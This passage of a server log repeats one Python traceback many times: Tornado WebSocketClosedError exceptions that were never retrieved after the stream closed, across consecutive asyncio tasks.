    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34924' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34930' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34932' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34946' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34950' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34954' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34958' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34964' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34966' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34981' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34985' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34989' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34993' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-34999' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35001' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35013' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35017' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35021' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35025' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35031' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35033' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35047' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35051' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35055' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35059' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35065' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35067' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35080' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35084' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35088' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35092' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35098' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35100' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35112' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35116' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35120' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35124' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35130' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35132' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35146' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35150' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35154' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35158' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35164' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35166' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35181' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35185' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35189' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35193' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35199' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1088, in wrapper
    await fut
tornado.iostream.StreamClosedError: Stream is closed

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/tornado/websocket.py", line 1090, in wrapper
    raise WebSocketClosedError()
tornado.websocket.WebSocketClosedError
Task exception was never retrieved
future: <Task finished name='Task-35201' coro=<WebSocketProtocol13.write_message.<locals>.wrapper() done, defined at /usr/local/lib/python3.10/dist-packages/tornado/websocket.py:1086> exception=WebSocketClosedError()>
